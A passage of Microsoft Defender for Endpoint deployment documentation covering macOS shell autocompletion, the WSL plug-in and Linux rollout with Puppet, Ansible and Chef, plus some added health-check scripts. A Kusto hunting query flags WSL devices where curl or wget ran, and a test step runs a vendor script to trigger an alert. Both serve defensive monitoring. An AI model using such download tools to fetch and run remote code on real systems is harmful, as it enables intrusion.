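        want="${line#*=}"
        got="$(health_field "$attr")"
        if [ "$got" != "$want" ]; then
            echo "$attr: expected $want, got ${got:-<no value>}"
            rc=1
        fi
    done <<EOF
$BASELINE
EOF
    return "$rc"
}

# Run only when invoked as "./audit.sh audit"; otherwise just define the
# functions. The exit status is non-zero when the baseline is not met, so
# the script can be used from a scheduled job or a compliance check.
case "${1:-}" in
    audit) audit_health && echo "all baseline settings in place" ;;
esac
```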

How to enable autocompletion

To enable autocompletion in bash, run the following command and restart the Terminal
session:

Bash

echo "source /Applications/Microsoft\ Defender.app/Contents/Resources/Tools/mdatp_completion.bash" >> ~/.bash_profile

To enable autocompletion in zsh:

Check whether autocompletion is enabled on your device:

zsh

cat ~/.zshrc | grep autoload

If the preceding command does not produce any output, you can enable
autocompletion using the following command:

zsh

echo "autoload -Uz compinit && compinit" >> ~/.zshrc

Run the following commands to enable autocompletion for Microsoft Defender for
Endpoint on macOS and restart the Terminal session:

zsh

sudo mkdir -p /usr/local/share/zsh/site-functions
sudo ln -svf "/Applications/Microsoft Defender.app/Contents/Resources/Tools/mdatp_completion.zsh" /usr/local/share/zsh/site-functions/_mdatp

Client Microsoft Defender for Endpoint quarantine directory

/Library/Application Support/Microsoft/Defender/quarantine/ contains the files
quarantined by mdatp. The files are named after the threat trackingId. The current
trackingIds are shown with mdatp threat list.

Microsoft Defender for Endpoint portal information

The Microsoft Defender for Endpoint blog, EDR capabilities for macOS have now
arrived, provides detailed guidance on what to expect.


Microsoft Defender for Endpoint plug-in
for Windows Subsystem for Linux (WSL)
Article • 12/13/2023

Overview
The Windows Subsystem for Linux (WSL) 2, which replaces the previous version of WSL
(supported by Microsoft Defender for Endpoint without a plug-in), provides a Linux
environment that is seamlessly integrated with Windows yet isolated using virtualization
technology. The Microsoft Defender for Endpoint for Windows Subsystem for Linux 2
(WSL) plug-in enables Defender for Endpoint to provide more visibility into all running
WSL containers, by plugging into the isolated subsystem.

Known issues and limitations

Be aware of the following before you start:

1. The plug-in doesn't yet automatically update. When a new plug-in version is
released, the new MSI package needs to be applied to perform the update. You
can apply the new package by using any tool that deploys software. Updates are
coming soon through Microsoft Update. If preferred, you can continue to use the
MSI package method.

2. As it takes a few minutes for the plug-in to fully instantiate and up to 30 minutes
for a WSL2 instance to onboard itself, short-lived WSL container instances might
result in the WSL2 instance not showing up in the Microsoft Defender portal
(https://security.microsoft.com ). Once a (any) distribution has been running long
enough (at least 30 minutes), it does show up.

3. If you're using a proxy in your (test) environment, make sure that the plug-in is set
up to use it correctly. WSL is typically not automatically configured to use a proxy.
For more information, see the section, Setting a proxy for Defender running in
WSL.

4. The use of a custom kernel in combination with the plug-in is not supported.
When you attempt to launch WSL with the plug-in installed, you will encounter the
error A fatal error was returned by plugin 'DefenderforEndpointPlug-in'. Error
message: 'Custom Kernel/Configuration not supported.'.

Software prerequisites

WSL version 2.0.7 or later must be running with at least one active distro.

Run wsl --update to make sure you are on the latest version. If wsl --version
shows a version older than 2.0.7, run wsl --update --pre-release to get the latest
update.

Defender for Endpoint must be onboarded and running on the Windows host OS.

The host OS must be running Windows 10, version 2004 and higher (build 19041
and higher) or Windows 11 to support the Windows Subsystem for Linux versions
that can work with the plug-in.

Software components and installer file names

Installer: DefenderPlugin-x64-0.23.1102.4.msi. You can download it from the
onboarding page in the Microsoft Defender portal.

Installation directories:

C:\Program Files\
C:\ProgramData\

Components installed:

DefenderforEndpointPlug-in.dll. This DLL is the library that loads Defender for
Endpoint to work within WSL. You can find it at C:\Program Files\Microsoft
Defender for Endpoint plug-in for WSL\plug-in.

healthcheck.exe. This program checks the health status of Defender for Endpoint
and enables you to see the installed versions of WSL, the plug-in, and Defender for
Endpoint. You can find it at C:\Program Files\Microsoft Defender for Endpoint
plug-in for WSL\tools.

Installation steps

If Windows Subsystem for Linux isn't installed yet, follow these steps:

1. Open Terminal or Command Prompt. (In Windows, go to Start > Command Prompt.
Or, right-click the start button and then select Terminal.)

2. Run the command wsl --install.

Confirm WSL is installed and running

1. Using Terminal or Command Prompt, run wsl --update to make sure you have the
latest version.

2. Run the wsl command to ensure WSL is running before testing.

Install the plug-in


After WSL is running and fully up to date, follow these steps to install the plug-in:

1. Install the MSI file downloaded from the onboarding section in the Microsoft
Defender portal (Settings > Endpoints > Onboarding > Windows Subsystem for
Linux 2 (plug-in).)

2. Open a command prompt/terminal and run wsl .

You can deploy the package using Microsoft Intune.

Note

If WslService is running, it stops during the installation process. You do not need to
onboard the subsystem separately; instead, the plug-in automatically onboards to
the tenant the Windows host is onboarded to.

Installation validation checklist

1. After update or installation, wait for at least five minutes for the plug-in to fully
initialize and write log output.

2. Open Terminal or Command Prompt. (In Windows, go to Start > Command Prompt.
Or, right-click the start button and then select Terminal.)

3. Run the command: cd "C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\tools".

4. Run the command .\healthcheck.exe.

5. Review the details of Defender and WSL and make sure they match or exceed the
following:

Defender Plug-in Version: 0.23.1102.4
WSL Version: 2.0.7.0 or later
WSL Defender Version: 101.23092.0011
WSL Defender Health: Healthy

Setting a proxy for Defender running in WSL


This section describes how to configure proxy connectivity for the Defender for
Endpoint plug-in. If your enterprise uses a proxy to provide connectivity to Defender for
Endpoint running on the Windows host, continue reading to determine whether you
need to configure it for the plug-in.

Reuse the Defender for Endpoint static proxy setting ( TelemetryProxyServer ).

If you want to use the host static proxy configuration for MDE for the WSL plug-in,
nothing more is required. This configuration is adopted by the plug-in automatically.

Set up a different/specific proxy configuration for MDE WSL

If you want to set up a different proxy for Defender running in WSL (other than the
Windows proxy specified with TelemetryProxyServer ), or you have currently configured
a system-wide proxy, the proxy configuration isn't automatically available for the plug-
in. In this case, take these steps:

1. Open Registry Editor as an administrator or use a tool that can configure registry
keys across devices.

2. Create a registry value (under the key shown as Path) with the following details:

Name: DefenderProxyServer
Type: REG_SZ
Value: <IP address>:<port> (Example: 192.126.30.222:8888 )
Path: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\Plugins\DefenderPlug-in

3. Once the registry value is set, if WSL is already running or the plug-in is already
installed, restart WSL using the following steps:

a. Open Command Prompt and run wsl --shutdown .

b. Then, run the command wsl .

Connectivity test for Defender running in WSL


The following procedure describes how to confirm that Defender for Endpoint in WSL has
internet connectivity.

1. Open Registry Editor as an administrator.

2. Create a registry value (under the key shown as Path) with the following details:

Name: ConnectivityTest
Type: REG_DWORD
Value: Number of seconds the plug-in must wait before running the test
(Recommended: 60 seconds)
Path: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\Plugins\DefenderPlug-in

3. Once the registry value is set, restart WSL using the following steps:

a. Open Command Prompt and run wsl --shutdown .

b. Run the command wsl .

4. Wait for 5 minutes and then run healthcheck.exe (located at C:\Program
Files\Microsoft Defender for Endpoint plug-in for WSL\tools ) for the results of
the connectivity test.

If successful, the connectivity test shows success.

7 Note

To set a proxy for use in WSL containers (the distributions running on the
subsystem), see Advanced settings configuration in WSL.

Verifying functionality and SOC analyst experience

After installing the plug-in, the subsystem and all its running containers are onboarded
to the Microsoft Defender portal.

1. Sign into the Microsoft Defender portal, and open the Devices view.

2. Filter using the tag WSL2.

You can see all WSL instances in your environment with an active Defender for Endpoint
plug-in for WSL. These instances represent all distributions running inside WSL on a
given host. The hostname of a device matches that of the Windows host. However, it's
represented as a Linux device.

3. Open the device page. In the Overview pane, there's a link for where the device is
hosted. The link enables you to understand that the device is running on a
Windows host. You can then pivot to the host for further investigation and/or
response.

The timeline is populated, similar to Defender for Endpoint on Linux, with events from
inside the subsystem (file, process, network). You can observe activity and detections in
the timeline view. Alerts and incidents are generated as appropriate as well.

Test the plug-in


To test the plug-in after installation, follow these steps:

1. Open Terminal or Command Prompt. (In Windows, go to Start > Command Prompt. Or,
right-click the Start button and then select Terminal.)

2. Run the command wsl .

3. Download and extract the script file from https://aka.ms/LinuxDIY .

4. At the Linux prompt, run the command ./mde_linux_edr_diy.sh .

An alert should appear in the portal after a few minutes for a detection on the
WSL2 instance.

7 Note

It takes about 5 minutes for the events to appear on the Microsoft Defender
portal.

Treat the machine as if it were a regular Linux host in your environment to perform
testing against. In particular, we would like to get your feedback on the ability to surface
potentially malicious behavior using the new plug-in.

Advanced hunting
In the Advanced Hunting schema, under the DeviceInfo table, there's a new attribute
called HostDeviceId that you can use to map a WSL instance to its Windows host device.
Here are a few sample hunting queries:

Get all WSL device IDs for the current organization/tenant

Kusto

let wsl_endpoints = DeviceInfo
| where OSPlatform == "Linux" and isnotempty(HostDeviceId)
| distinct DeviceId;
wsl_endpoints

Get WSL device IDs and their corresponding host device IDs

Kusto

DeviceInfo
| where OSPlatform == "Linux" and isnotempty(HostDeviceId)
| distinct WSLDeviceId=DeviceId, HostDeviceId

Get a list of WSL device IDs where curl or wget was run

Kusto

let wsl_endpoints = DeviceInfo
| where OSPlatform == "Linux" and isnotempty(HostDeviceId)
| distinct DeviceId;
DeviceProcessEvents
| where FileName == "curl" or FileName == "wget"
| where DeviceId in (wsl_endpoints)
| sort by Timestamp desc

Troubleshooting
1. The command healthcheck.exe shows the output, "Launch WSL distro with 'bash'
command and retry in 5 minutes."

2. If the previously mentioned error occurs, take the following steps:

a. Open a terminal instance and run the command wsl .

b. Wait for at least 5 minutes before rerunning the health check.

3. The healthcheck.exe command might show the output, "Waiting for Telemetry.
Please retry in 5 minutes."

If that error occurs, wait for 5 minutes and rerun healthcheck.exe .

4. If you don't see any devices in the Microsoft Defender portal, or you don't see any
events in the timeline, check these things:

If you aren't seeing a machine object, make sure sufficient time has passed
for onboarding to complete (typically up to 10 minutes).

Make sure to use the right filters, and that you have the appropriate
permissions assigned to view all device objects. (For example, is your
account/group restricted to a specific device group?)

Use the health check tool to get an overview of overall plug-in health.
Open Terminal, and run the healthcheck.exe tool from C:\Program
Files\Microsoft Defender for Endpoint plug-in for WSL\tools .

Enable the connectivity test and check for Defender for Endpoint connectivity in
WSL. If the connectivity test fails, provide the output of the health check tool to
mdeforwsl-preview@microsoft.com.

5. In case you face any other challenges or issues, open the terminal and run the
following commands to generate the support bundle:

PowerShell

cd "C:\Program Files\Microsoft Defender for Endpoint plug-in for WSL\tools"
.\healthcheck.exe --supportBundle

The support bundle can be found in the path provided by the previous command.



Deploy Microsoft Defender for Endpoint
on Linux with Puppet
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This article describes how to deploy Defender for Endpoint on Linux using Puppet. A
successful deployment requires the completion of all of the following tasks:

Download the onboarding package
Create Puppet manifest
Deployment
Check onboarding status

) Important

This article contains information about third-party tools. This is provided to help
complete integration scenarios, however, Microsoft does not provide
troubleshooting support for third-party tools.
Contact the third-party vendor for support.

Prerequisites and system requirements


For a description of prerequisites and system requirements for the current software
version, see the main Defender for Endpoint on Linux page.

In addition, for Puppet deployment, you need to be familiar with Puppet administration
tasks, have Puppet configured, and know how to deploy packages. Puppet has many
ways to complete the same task. These instructions assume availability of supported
Puppet modules, such as apt to help deploy the package. Your organization might use a
different workflow. Refer to the Puppet documentation for details.
Download the onboarding package
Download the onboarding package from Microsoft Defender portal.

2 Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

1. In Microsoft Defender portal, go to Settings > Endpoints > Device management
> Onboarding.

2. In the first drop-down menu, select Linux Server as the operating system. In the
second drop-down menu, select Your preferred Linux configuration management
tool as the deployment method.

3. Select Download onboarding package. Save the file as
WindowsDefenderATPOnboardingPackage.zip.

4. From a command prompt, verify that you have the file.

Bash

ls -l

Output

total 8
-rw-r--r-- 1 test staff 4984 Feb 18 11:22
WindowsDefenderATPOnboardingPackage.zip

5. Extract the contents of the archive.

Bash

unzip WindowsDefenderATPOnboardingPackage.zip

Output

Archive: WindowsDefenderATPOnboardingPackage.zip
inflating: mdatp_onboard.json

Create a Puppet manifest


You need to create a Puppet manifest for deploying Defender for Endpoint on Linux to
devices managed by a Puppet server. This example makes use of the apt and yumrepo
modules available from puppetlabs, and assumes that the modules have been installed
on your Puppet server.

Create the folders install_mdatp/files and install_mdatp/manifests under the modules
folder of your Puppet installation. This folder is typically located in
/etc/puppetlabs/code/environments/production/modules on your Puppet server. Copy the
mdatp_onboard.json file created above to the install_mdatp/files folder. Create an init.pp
file that contains the deployment instructions:

Bash

pwd

Output

/etc/puppetlabs/code/environments/production/modules

Bash

tree install_mdatp

Output

install_mdatp
├── files
│ └── mdatp_onboard.json
└── manifests
└── init.pp

Contents of install_mdatp/manifests/init.pp
Defender for Endpoint on Linux can be deployed from one of the following channels
(denoted below as [channel]): insiders-fast, insiders-slow, or prod. Each of these channels
corresponds to a Linux software repository.

The choice of the channel determines the type and frequency of updates that are
offered to your device. Devices in insiders-fast are the first ones to receive updates and
new features, followed later by insiders-slow and lastly by prod.

In order to preview new features and provide early feedback, it is recommended that
you configure some devices in your enterprise to use either insiders-fast or insiders-slow.

2 Warning

Switching the channel after the initial installation requires the product to be
reinstalled. To switch the product channel: uninstall the existing package, re-
configure your device to use the new channel, and follow the steps in this
document to install the package from the new location.

Note your distribution and version and identify the closest entry for it under
https://packages.microsoft.com/config/[distro]/ .

In the below commands, replace [distro] and [version] with the information you've
identified:

7 Note

In case of RedHat, Oracle Linux, Amazon Linux 2, and CentOS 8, replace [distro] with
'rhel'.

puppet

# Puppet manifest to install Microsoft Defender for Endpoint on Linux.
#
# @param channel The release channel based on your environment: insiders-fast,
#   insiders-slow, or prod. The default below is insiders-fast; set 'prod' for
#   devices that should only receive production updates.
# @param distro The Linux distribution in lowercase. In case of RedHat,
#   Oracle Linux, Amazon Linux 2, and CentOS 8, the distro variable should be
#   'rhel'.
# @param version The Linux distribution release number, e.g. 7.4.

class install_mdatp (
$channel = 'insiders-fast',
$distro = undef,
$version = undef
) {
case $facts['os']['family'] {
'Debian' : {
$release = $channel ? {
'prod' => $facts['os']['distro']['codename'],
default => $channel
}
apt::source { 'microsoftpackages' :
location =>
"https://packages.microsoft.com/${distro}/${version}/prod",
release => $release,
repos => 'main',
key => {
'id' => 'BC528686B50D79E339D3721CEB3E94ADBE1229CF',
'server' => 'keyserver.ubuntu.com',
},
}
}
'RedHat' : {
yumrepo { 'microsoftpackages' :
baseurl =>
"https://packages.microsoft.com/${distro}/${version}/${channel}",
descr => "packages-microsoft-com-prod-${channel}",
enabled => 1,
gpgcheck => 1,
gpgkey => 'https://packages.microsoft.com/keys/microsoft.asc',
}
}
default : { fail("${facts['os']['family']} is currently not supported.")
}
}

case $facts['os']['family'] {
/(Debian|RedHat)/: {
file { ['/etc/opt', '/etc/opt/microsoft', '/etc/opt/microsoft/mdatp']:
ensure => directory,
owner => root,
group => root,
mode => '0755',
}

file { '/etc/opt/microsoft/mdatp/mdatp_onboard.json':
source => 'puppet:///modules/install_mdatp/mdatp_onboard.json',
owner => root,
group => root,
mode => '0600',
require => File['/etc/opt/microsoft/mdatp'],
}
package { 'mdatp':
ensure => 'installed',
require => File['/etc/opt/microsoft/mdatp/mdatp_onboard.json'],
}
}
default : { fail("${facts['os']['family']} is currently not supported.")
}
}
}

Deployment
Include the above manifest in your site.pp file:

Bash

cat /etc/puppetlabs/code/environments/production/manifests/site.pp

Output

node "default" {
include install_mdatp
}

Enrolled agent devices periodically poll the Puppet Server and install new configuration
profiles and policies as soon as they are detected.

Monitor Puppet deployment


On the agent device, you can also check the onboarding status by running:

Bash

mdatp health

Output

...
licensed : true
org_id : "[your organization identifier]"
...

licensed: This confirms that the device is tied to your organization.

org_id: This is your Defender for Endpoint organization identifier.

Check onboarding status


You can check that devices have been correctly onboarded by creating a script. For
example, the following command checks an enrolled device for onboarding status:

Bash

mdatp health --field healthy

The above command prints 1 if the product is onboarded and functioning as expected.

) Important

When the product starts for the first time, it downloads the latest antimalware
definitions. Depending on your Internet connection, this can take up to a few
minutes. During this time the above command returns a value of 0 .

If the product is not healthy, the exit code (which can be checked through echo $? )
indicates the problem:

1 if the device isn't onboarded yet.
3 if the connection to the daemon cannot be established.
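As an added example (not part of the Microsoft documentation or the product), the following shell script wraps the check above the way a fleet-wide onboarding audit would. It separates "still downloading definitions" from "not onboarded" and "daemon unreachable" using only the output values and exit codes documented above, polls with a bounded wait instead of failing on the first 0, and compares org_id against the tenant you expect so that a device onboarded with a stale or foreign onboarding package is caught. The function names, the probe-function parameter and the --run flag are conventions of this example; the quoted form of the org_id value is assumed from the mdatp health output shown above.

```shell
#!/bin/sh
# Added example: interpret `mdatp health --field healthy` for an onboarding audit.
# Only the documented behaviour is relied on: prints 1 when healthy, 0 while the first
# definition download runs; exit code 1 = not onboarded, 3 = daemon unreachable.
# Function names and the --run flag are conventions of this example, not of mdatp.

# classify_health OUTPUT EXITCODE -> healthy | starting | not_onboarded | no_daemon | unknown
classify_health() {
  out=$1
  rc=$2
  if [ "$rc" -eq 0 ]; then
    case "$out" in
      1) echo healthy ;;
      0) echo starting ;;   # first start: definitions still downloading
      *) echo unknown ;;
    esac
  elif [ "$rc" -eq 1 ]; then
    echo not_onboarded
  elif [ "$rc" -eq 3 ]; then
    echo no_daemon
  else
    echo unknown
  fi
}

# run_mdatp_health: the real probe; prints the field value and keeps mdatp's exit code.
run_mdatp_health() {
  mdatp health --field healthy
}

# wait_for_health PROBE_FN MAX_TRIES DELAY_SECS
# Re-runs PROBE_FN while the state is "starting" (bounded), prints the final state,
# and returns success only for "healthy". A fake probe can be passed in for testing.
wait_for_health() {
  probe=$1
  tries=$2
  delay=$3
  state=unknown
  while [ "$tries" -gt 0 ]; do
    if out=$("$probe"); then rc=0; else rc=$?; fi
    state=$(classify_health "$out" "$rc")
    if [ "$state" != starting ]; then break; fi
    tries=$((tries - 1))
    if [ "$tries" -gt 0 ]; then sleep "$delay"; fi
  done
  echo "$state"
  [ "$state" = healthy ]
}

# check_org_id ACTUAL EXPECTED -> succeeds when the device reports the expected tenant.
# `mdatp health --field org_id` is assumed to print the value quoted, as in the output
# above, so quotes are stripped before comparing; an empty value never matches.
check_org_id() {
  actual=$(printf '%s' "$1" | tr -d '"')
  [ -n "$actual" ] && [ "$actual" = "$2" ]
}

# Stand-alone use on an onboarded host (not executed under test):
#   ./onboard_check.sh --run <expected-org-id>
if [ "${1:-}" = "--run" ]; then
  state=$(wait_for_health run_mdatp_health 6 30) || { echo "mdatp state: $state" >&2; exit 1; }
  if check_org_id "$(mdatp health --field org_id)" "$2"; then
    echo "onboarded to expected tenant"
  else
    echo "onboarded, but org_id does not match $2" >&2
    exit 2
  fi
fi
```

The exit code is examined before the printed value because a device that is not onboarded can still print 0; treating "0" alone as "still starting" would hide an onboarding failure behind a retry loop.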

Log installation issues


For more information on how to find the automatically generated log that is created by
the installer when an error occurs, see Log installation issues.

Operating system upgrades


When upgrading your operating system to a new major version, you must first uninstall
Defender for Endpoint on Linux, install the upgrade, and finally reconfigure Defender for
Endpoint on Linux on your device.

Uninstallation
Create a module remove_mdatp similar to install_mdatp with the following contents in
init.pp file:

puppet

class remove_mdatp {
package { 'mdatp':
ensure => 'purged',
}
}

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Deploy Microsoft Defender for Endpoint
on Linux with Ansible
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This article describes how to deploy Defender for Endpoint on Linux using Ansible. A
successful deployment requires the completion of all of the following tasks:

Download the onboarding package
Create Ansible YAML files
Deployment
References

) Important

This article contains information about third-party tools. This is provided to help
complete integration scenarios, however, Microsoft does not provide
troubleshooting support for third-party tools.
Contact the third-party vendor for support.

Prerequisites and system requirements


Before you get started, see the main Defender for Endpoint on Linux page for a
description of prerequisites and system requirements for the current software version.

In addition, for Ansible deployment, you need to be familiar with Ansible administration
tasks, have Ansible configured, and know how to deploy playbooks and tasks. Ansible
has many ways to complete the same task. These instructions assume availability of
supported Ansible modules, such as apt and unarchive to help deploy the package. Your
organization might use a different workflow. Refer to the Ansible documentation for
details.
Ansible needs to be installed on at least one computer (Ansible calls this the
control node).

SSH must be configured for an administrator account between the control node
and all managed nodes (devices that will have Defender for Endpoint installed on
them), and it is recommended to be configured with public key authentication.

The following software must be installed on all managed nodes:


curl
python-apt (if you are deploying on distributions using apt as a package
manager)

All managed nodes must be listed in the following format in the
/etc/ansible/hosts or relevant file:

Bash

[servers]
host1 ansible_ssh_host=10.171.134.39
host2 ansible_ssh_host=51.143.50.51

Ping test:

Bash

ansible -m ping all

Download the onboarding package


Download the onboarding package from Microsoft Defender portal.

2 Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

1. In Microsoft Defender portal, go to Settings > Endpoints > Device management
> Onboarding.
2. In the first drop-down menu, select Linux Server as the operating system. In the
second drop-down menu, select Your preferred Linux configuration management
tool as the deployment method.

3. Select Download onboarding package. Save the file as
WindowsDefenderATPOnboardingPackage.zip.

4. From a command prompt, verify that you have the file. Extract the contents of the
archive:

Bash

ls -l

Output

total 8
-rw-r--r-- 1 test staff 4984 Feb 18 11:22
WindowsDefenderATPOnboardingPackage.zip

Bash

unzip WindowsDefenderATPOnboardingPackage.zip

Output

Archive: WindowsDefenderATPOnboardingPackage.zip
inflating: mdatp_onboard.json

Create Ansible YAML files


Create a subtask or role files that contribute to a playbook or task.

Create the onboarding task, onboarding_setup.yml :

YAML

- name: Create MDATP directories
  file:
    path: /etc/opt/microsoft/mdatp/
    recurse: true
    state: directory
    mode: '0755'
    owner: root
    group: root

- name: Register mdatp_onboard.json
  stat:
    path: /etc/opt/microsoft/mdatp/mdatp_onboard.json
  register: mdatp_onboard

- name: Extract WindowsDefenderATPOnboardingPackage.zip into /etc/opt/microsoft/mdatp
  unarchive:
    src: WindowsDefenderATPOnboardingPackage.zip
    dest: /etc/opt/microsoft/mdatp
    mode: '0600'
    owner: root
    group: root
  when: not mdatp_onboard.stat.exists

Add the Defender for Endpoint repository and key, add_apt_repo.yml :

Defender for Endpoint on Linux can be deployed from one of the following
channels (denoted below as [channel]): insiders-fast, insiders-slow, or prod. Each of
these channels corresponds to a Linux software repository.

The choice of the channel determines the type and frequency of updates that are
offered to your device. Devices in insiders-fast are the first ones to receive updates
and new features, followed later by insiders-slow and lastly by prod.

In order to preview new features and provide early feedback, it is recommended
that you configure some devices in your enterprise to use either insiders-fast or
insiders-slow.

2 Warning

Switching the channel after the initial installation requires the product to be
reinstalled. To switch the product channel: uninstall the existing package, re-
configure your device to use the new channel, and follow the steps in this
document to install the package from the new location.

Note your distribution and version and identify the closest entry for it under
https://packages.microsoft.com/config/[distro]/ .

In the following commands, replace [distro] and [version] with the information
you've identified.

7 Note

In case of Oracle Linux and Amazon Linux 2, replace [distro] with "rhel". For
Amazon Linux 2, replace [version] with "7". For Oracle Linux, replace [version]
with the version of Oracle Linux.

YAML

- name: Add Microsoft APT key
  apt_key:
    url: https://packages.microsoft.com/keys/microsoft.asc
    state: present
  when: ansible_os_family == "Debian"

# [codename] (for example focal) selects the prod channel. For insiders-fast or
# insiders-slow, the channel name takes the place of [codename] in the suite field.
- name: Add Microsoft apt repository for MDATP
  apt_repository:
    repo: deb [arch=arm64,armhf,amd64] https://packages.microsoft.com/[distro]/[version]/prod [codename] main
    update_cache: yes
    state: present
    filename: microsoft-[channel]
  when: ansible_os_family == "Debian"

- name: Add Microsoft DNF/YUM key
  rpm_key:
    state: present
    key: https://packages.microsoft.com/keys/microsoft.asc
  when: ansible_os_family == "RedHat"

- name: Add Microsoft yum repository for MDATP
  yum_repository:
    name: packages-microsoft-[channel]
    description: Microsoft Defender for Endpoint
    file: microsoft-[channel]
    baseurl: https://packages.microsoft.com/[distro]/[version]/[channel]/
    gpgcheck: yes
    enabled: yes
  when: ansible_os_family == "RedHat"
Create the Ansible install and uninstall YAML files.

For apt-based distributions use the following YAML file:

Bash

cat install_mdatp.yml

Output

- hosts: servers
  tasks:
    # 'include' was removed in ansible-core 2.16; include_tasks is the supported form
    - include_tasks: ../roles/onboarding_setup.yml
    - include_tasks: ../roles/add_apt_repo.yml
    - name: Install MDATP
      apt:
        name: mdatp
        state: latest
        update_cache: yes

Bash

cat uninstall_mdatp.yml

Output

- hosts: servers
tasks:
- name: Uninstall MDATP
apt:
name: mdatp
state: absent

For dnf-based distributions use the following YAML file:

Bash

cat install_mdatp_dnf.yml

Output

- hosts: servers
  tasks:
    # 'include' was removed in ansible-core 2.16; include_tasks is the supported form
    - include_tasks: ../roles/onboarding_setup.yml
    - include_tasks: ../roles/add_yum_repo.yml
    - name: Install MDATP
      dnf:
        name: mdatp
        state: latest
        enablerepo: packages-microsoft-[channel]

Bash

cat uninstall_mdatp_dnf.yml

Output

- hosts: servers
tasks:
- name: Uninstall MDATP
dnf:
name: mdatp
state: absent

Deployment
Now run the tasks files under /etc/ansible/playbooks/ or relevant directory.

Installation:

Bash

ansible-playbook /etc/ansible/playbooks/install_mdatp.yml -i
/etc/ansible/hosts

) Important

When the product starts for the first time, it downloads the latest antimalware
definitions. Depending on your Internet connection, this can take up to a few
minutes.

Validation/configuration:

Bash

ansible -m shell -a 'mdatp connectivity test' all

Bash

ansible -m shell -a 'mdatp health' all

Uninstallation:

Bash

ansible-playbook /etc/ansible/playbooks/uninstall_mdatp.yml -i
/etc/ansible/hosts

Log installation issues


See Log installation issues for more information on how to find the automatically
generated log that is created by the installer when an error occurs.

Operating system upgrades


When upgrading your operating system to a new major version, you must first uninstall
Defender for Endpoint on Linux, install the upgrade, and finally reconfigure Defender for
Endpoint on Linux on your device.

References
Add or remove YUM repositories

Manage packages with the dnf package manager

Add and remove APT repositories

Manage apt-packages

See also
Investigate agent health issues

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Deploy Defender for Endpoint on Linux
with Chef
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

) Important

This article contains information about third-party tools. This is provided to help
complete integration scenarios, however, Microsoft does not provide
troubleshooting support for third-party tools.
Contact the third-party vendor for support.

Before you begin: Install unzip if it's not already installed.

The Chef components are already installed and a Chef repository exists (chef generate
repo <reponame>) to store the cookbook that's used to deploy Defender for Endpoint to
Chef-managed Linux servers.

You can create a new cookbook in your existing repository by running the following
command from inside the cookbooks folder that is in your chef repository:

Bash

chef generate cookbook mdatp

This command creates a new folder structure for the new cookbook called mdatp. You
can also use an existing cookbook if you already have one you'd like to use to add the
Defender for Endpoint deployment into. After the cookbook is created, create a files
folder inside the cookbook folder that just got created:

Bash

mkdir mdatp/files

Transfer the Linux Server Onboarding zip file that can be downloaded from the
Microsoft Defender portal to this new files folder.
2 Warning

Repackaging the Defender for Endpoint installation package is not a supported
scenario. Doing so can negatively impact the integrity of the product and lead to
adverse results, including but not limited to triggering tampering alerts and
updates failing to apply.

On the Chef Workstation, navigate to the mdatp/recipes folder. This folder is created
when the cookbook was generated. Use your preferred text editor (like vi or nano) to
add the following instructions to the end of the default.rb file:

include_recipe '::onboard_mdatp'
include_recipe '::install_mdatp'

Then save and close the default.rb file.

Next create a new recipe file named install_mdatp.rb in the recipes folder and add this
text to the file:

Ruby

# Add Microsoft Defender repo
case node['platform_family']
when 'debian'
  apt_repository 'MDAPRepo' do
    arch 'amd64'
    cache_rebuild true
    cookbook false
    deb_src false
    key 'BC528686B50D79E339D3721CEB3E94ADBE1229CF'
    keyserver 'keyserver.ubuntu.com'
    distribution 'focal'
    repo_name 'microsoft-prod'
    components ['main']
    # Leave the repository untrusted so apt verifies package signatures with the
    # key above; trusted true would make apt accept unsigned packages from it.
    trusted false
    # The package repository itself, not the config/ path that hosts the .list files.
    uri 'https://packages.microsoft.com/ubuntu/20.04/prod'
  end
  apt_package 'mdatp'
when 'rhel'
  yum_repository 'microsoft-prod' do
    # The package repository itself, not the config/ path that hosts the .repo files.
    baseurl 'https://packages.microsoft.com/rhel/7/prod/'
    description 'Microsoft Defender for Endpoint'
    enabled true
    gpgcheck true
    gpgkey 'https://packages.microsoft.com/keys/microsoft.asc'
  end
  # platform_version is a string (for example "8.9"); compare its major number as an integer
  if node['platform_version'].to_i <= 8
    yum_package 'mdatp'
  else
    dnf_package 'mdatp'
  end
end

You need to modify the version number, distribution, and repo name to match the
version you're deploying to and the channel you'd like to deploy. Next, create an
onboard_mdatp.rb file in the mdatp/recipes folder. Add the following text to that
file:

Ruby

# Create MDATP directory
mdatp = '/etc/opt/microsoft/mdatp'
zip_path = '/path/to/chef-repo/cookbooks/mdatp/files/WindowsDefenderATPOnboardingPackage.zip'

directory mdatp do
  owner 'root'
  group 'root'
  mode '0755'
  recursive true
end

# Extract WindowsDefenderATPOnboardingPackage.zip into /etc/opt/microsoft/mdatp
bash 'Extract Onboarding Json MDATP' do
  code <<-EOS
    unzip #{zip_path} -d #{mdatp}
  EOS
  not_if { ::File.exist?('/etc/opt/microsoft/mdatp/mdatp_onboard.json') }
end

Make sure to update the path name to the location of the onboarding file. To test
deploy it on the Chef workstation, run sudo chef-client -z -o mdatp . After your
deployment, you should consider creating and deploying a configuration file to the
servers based on Set preferences for Microsoft Defender for Endpoint on Linux. After
creating and testing your configuration file, you can put it into the
cookbook/mdatp/files folder where you also placed the onboarding package. Then you
can create a settings_mdatp.rb file in the mdatp/recipes folder and add this text:

Ruby

# Copy the configuration file
